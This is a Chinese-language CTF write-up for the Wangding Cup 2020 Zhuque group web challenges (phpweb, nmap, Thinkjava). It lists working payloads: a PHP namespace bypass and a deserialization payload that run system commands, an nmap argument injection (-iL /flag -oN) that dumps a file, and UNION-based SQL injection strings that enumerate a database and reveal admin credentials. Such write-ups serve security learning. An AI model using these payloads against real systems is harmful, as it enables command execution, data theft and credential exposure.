[网鼎杯2020朱雀组]Web部分wp

phpweb

姿势1命名空间绕过。

func=\\system
p=find / -name flag*

func=\\system
p=cat /xx/flag

姿势2序列化

buu群里和大佬学到还可以用反序列化

func=unserialize&p=0:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}

nmap

127.0.0.1' -iL /flag -oN fuck.txt '
访问http:xxx/fuck.txt即可

Thinkjava

这个题一看404本来以为项目出错了，还麻烦了赵总，buuoj无敌。

第一步是一个sql注入，但是我把库爆干净了也没出什么东西。
原理就是下方的两张图片的关键性代码。

一个jdbc连接示例:

jdbc:mysql://127.0.0.1:3306/name?useUnicode=true&xx=xxxx&xx=xx

上方这段是一个jdbc连接的配置项，用过高版本mysql和jdbc的应该很清楚，不用多说。

爆库

sql注入具体操作大家都会我就写两个简单的示例

dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(information_schema.schemata)#

爆字段名

dbName=myapp?useUnicode=true'union/**/select/**/group_concat(column_name)from(information_schema.columns)where(table_name='user')and(table_schema='myapp')#

有价值信息

数据库除了自带得几个数据库就只有myapp

表只有一个user表

字段有

id,name,pwd

对应的字段值

id name passwd

1 admin admin@Rrrr_ctf_asde

部分过程结果截图

脑瓜子嗡嗡的

这里写的太多了，Think Java后续请参考最新博客 :https://www.cnblogs.com/h3zh1/p/12914439.html